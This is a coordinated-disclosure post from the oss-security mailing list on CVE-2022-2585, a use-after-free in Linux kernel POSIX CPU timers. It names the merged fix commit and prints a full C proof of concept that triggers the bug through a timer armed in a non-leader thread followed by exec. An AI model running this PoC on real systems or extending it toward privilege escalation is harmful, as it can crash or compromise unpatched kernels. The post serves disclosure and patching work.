[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: Re: [oss-security] CVE-2022-2585 - Linux kernel POSIX CPU timer UAF
From: Thadeu Lima de Souza Cascardo <cascardo () canonical ! com>
Date: 2022-08-17 20:29:35
Message-ID: Yv1Pry60yZ6mOscO () quatroqueijos
[Download RAW message or body]
On Tue, Aug 09, 2022 at 02:13:40PM -0300, Thadeu Lima de Souza Cascardo wrote:
> CVE-2022-2585 - Linux kernel POSIX CPU timer UAF
>
> It was discovered that when exec'ing from a non-leader thread, armed POSIX
> CPU timers would be left on a list but freed, leading to a use-after-free.
>
> An independent security researcher working with SSD Secure Disclosure
> discovered that this vulnerability could be exploited for Local Privilege
> Escalation.
>
> This bug was introduced by commit 55e8c8eb2c7b ("posix-cpu-timers: Store a
> reference to a pid not a task"), which is present since v5.7-rc1.
>
> This has been assigned CVE-2022-2585.
>
> A PoC that will trigger KASAN is going to be posted in a week.
>
> A fix has been sent to linux-kernel@vger.kernel.org and is at
> https://lore.kernel.org/lkml/20220809170751.164716-1-cascardo@canonical.com/T/#u.
This has been merged as commit e362359ace6f87c201531872486ff295df306d13.
The PoC should be built with the name poc as that is what it tries to exec.
#define _GNU_SOURCE
#include <sched.h>
#include <time.h>
#include <unistd.h>
#include <sys/wait.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
static int timer_uaf(void *d)
{
timer_t tid;
struct itimerspec its;
its.it_interval.tv_sec = 3;
its.it_interval.tv_nsec = 0;
its.it_value.tv_sec = 3;
its.it_value.tv_nsec = 0;
timer_create(CLOCK_THREAD_CPUTIME_ID, NULL, &tid);
timer_settime(tid, 0, &its, NULL);
execlp("./poc", "poc1", NULL);
}
static char stack[8192];
int main(int argc, char **argv)
{
timer_t tid;
int i;
if (!strcmp(argv[0], "poc1")) {
sleep(2);
exit(0);
}
if (fork() > 0) {
waitpid(-1, NULL, 0);
exit(0);
}
clone(timer_uaf, stack+4096, SIGCHLD | CLONE_VM | CLONE_SIGHAND | CLONE_THREAD, NULL, NULL, NULL);
while(1);
return 0;
}
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic